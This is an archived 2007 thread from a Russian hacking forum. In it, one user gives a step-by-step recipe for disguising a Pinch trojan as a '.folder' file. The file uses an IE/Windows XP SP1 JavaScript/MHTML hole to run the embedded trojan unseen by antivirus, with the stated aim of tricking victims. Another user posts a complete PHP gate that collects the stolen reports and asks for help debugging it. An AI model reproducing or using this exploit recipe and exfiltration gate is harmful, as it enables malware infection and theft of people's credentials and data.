ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.09.2007, 02:18
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме: 422909
Репутация:
200
|
|
Друзья! Кто-нибудь слышал о Смертельном скрипте? Прикольная фишка!!! Pinch скрывает напрочть от любых антивирей! Правда одно но... скрипт использует дыру в SP1. Так ыто если на компе жертвы именно он то надо юзать! Кого заинтересовало отпишитесь, расскажу 
|
|
|

04.09.2007, 02:22
|
|
Участник форума
Регистрация: 09.08.2007
Сообщений: 265
Провел на форуме: 5329924
Репутация:
674
|
|
Сообщение от A2GIL
Друзья! Кто-нибудь слышал о Смертельном скрипте? Прикольная фишка!!! Pinch скрывает напрочть от любых антивирей! Правда одно но... скрипт использует дыру в SP1. Так ыто если на компе жертвы именно он то надо юзать! Кого заинтересовало отпишитесь, расскажу 
расскажи, и ссылку если можно?
|
|
|

04.09.2007, 20:13
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме: 422909
Репутация:
200
|
|
Итак смертельный скрипт: (правда тема старая. Идея nsd):
Повторяю еще раз - сей трюк прокатит только на SP1.
Идея состоит вот в чем: если воспользоваться расширением .folder в SP1 то файл отображается как обыкновенная папка! При ее открытии специально подготовленный javascript (надо использовать бреш ослика) запускает тело троя! Причем на эту папку не гавкает антивирус.
Сейчас я подробно расскажу как это сделать...
Сперва создаем текстовый документ, назавем его photo.txt. Далее открываем его в текстовом редакторе и прописываем тэги:
<html>
</html>
Сохраняем. Теперь меняем рассширение файла с .txt на .folder и вуоля! Наш файл файл превращается в папку (в псевдопапку) Попробуем его открыть...О! открывается в IE.
Теперь необходимо подготовить javascript. Возвращаем нашему файлу былую форму-меняем расширение обратно на .txt и помещаем туда следующий скрипт:
<html>//уже прописан
MIME-Version: 1.0
Content-Location:trojan.exe
Content-Transfer-Encoding: mac-binhex40
//сюда мы поместим тело троя в HQX формате(чуть позже как это сделать...)
<title>|</title>
<body bgcolor=blue scroll=no>
<SCRIPT>
function zoh(){
z = document.URL;
p = z.substr(-0,z.lastIndexOf("\\"));
p = unescape(p)
document.write( '<title></title><body scroll=no bgcolor=#000000>
//здесь оставляем пару комментариев жертве на ваш выбор. Можно, например: Кердык тебе!!!!
<object classid="clsid:77777777-7777-7777-7777" codebase="mhtml:'+p+'\\1.folder!trojan.exe" width=1 height=1></object>');
}
// это для того, чтобы обмануть AVP
document.write('');
setTimeout("zoh()",0);
</script>
</html>
Все наш javascript готов! Теперь надо скомпилировать трой, к примеру Pinch v 1.0. Ну думаю тут проблем не будет, так как там на первых страницах уже все есть. Итак скомпилировали...(правда я не пробовал через http, делал через smtp).
Так...далее нам понадобиться утилита binhex, которую можно взять http//www.aladin88.jino-net.ru/tools/binhex.rar
Распаковываем и закидываем её в папку где лежит трой Pinch. Запускаем binhex выбираем нашего трояна (как вы его там назвали) и нажимаем F2. В результате получаем трояна в формате HQX. Открываем его в блокноте и копируем все содержимое (да эти непонятные символы!) и вставляем в скрипт(вместо коменнтария).
Теперь сожраняем и меняем расширение на .folder. Всё наше творение готово! Теперь с улыбкой впариваем его ламеру
---------------------------------------------
Плз, оцените статью 
|
|
|

05.09.2007, 20:31
|
|
Новичок
Регистрация: 27.08.2007
Сообщений: 20
Провел на форуме: 349114
Репутация:
9
|
|
у меня проблемка...
итак.. полюзуюсь пинч3 от васьки, хост h18.ru, для управления хостом - SmartFTP
ето мой гейт:
PHP код:
<?
//CFG
$mode = 2; //1.Send to e-mail, 2.Save to file, 3.E-mail+file
$rndatch = false; //Random reports names
$savetodir = true; //Save reports to changed directory
$dirname = "ot4etu"; //Directory name
// a - recepient
// b - subject
// c - message body
// d - file name (not *.php)
//Getting data
$ip=getenv("REMOTE_ADDR");
$email=$_POST['a'];
$subject=$_POST['b']." (".$ip.")";
$msg=str_replace(" ", "+", $_POST['c']);
$var=$_POST['d'];
//Storing || Sending data
//via E-Mail
IF($mode == 1 || $mode == 3)
{
IF($rndatch)
{
$array=range('a', 'z');
$c=count($array);
$var=$array[rand(1, $c)].$array[rand(1, $c)].$array[rand(1, $c)].$array[rand(1, $c)].rand(0, 9).rand(0, 9).".bin";
}
$headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";
$headers.= "Content-Transfer-Encoding: base64\n";
$headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";
mail($email, $subject, $msg, $headers);
}
//via File
IF($mode == 2 || $mode == 3)
{
//To dir
IF($savetodir)
{
@mkdir($dirname);
@chdir($dirname);
}
$vartype=substr($var, -3, 3);
IF($vartype == "php")
$var .= ".saf";
$filename = date('H_i-d.m.Y', time()+3600*6)."_".$ip."_".$var;
$fp=fopen($filename, 'w');
fwrite($fp, base64_decode($msg));
fclose($fp);
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>ret_ok</title>
</head>
<body>
</body>
</html>
ТУТ скрин с хоста(CMOD раставляю так: WWW-775, passi-777, ot4etu-777, gate.php-666)
ТУТ - скрин Билдера
отчети не идут, ненаю что не так.....(перечитал уже наверно все стати рунета по настройке пинча)
антивирус отключен, Билдер через на два мыла работает отлично..
помогите плиз
|
|
|

25.09.2007, 04:14
|
|
Постоянный
Регистрация: 18.08.2007
Сообщений: 846
Провел на форуме: 5585816
Репутация:
1236
|
|
Напишите настройку пинча и что где вписывать в gate.php! Или сделайте лучше видео как на хост заливать!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|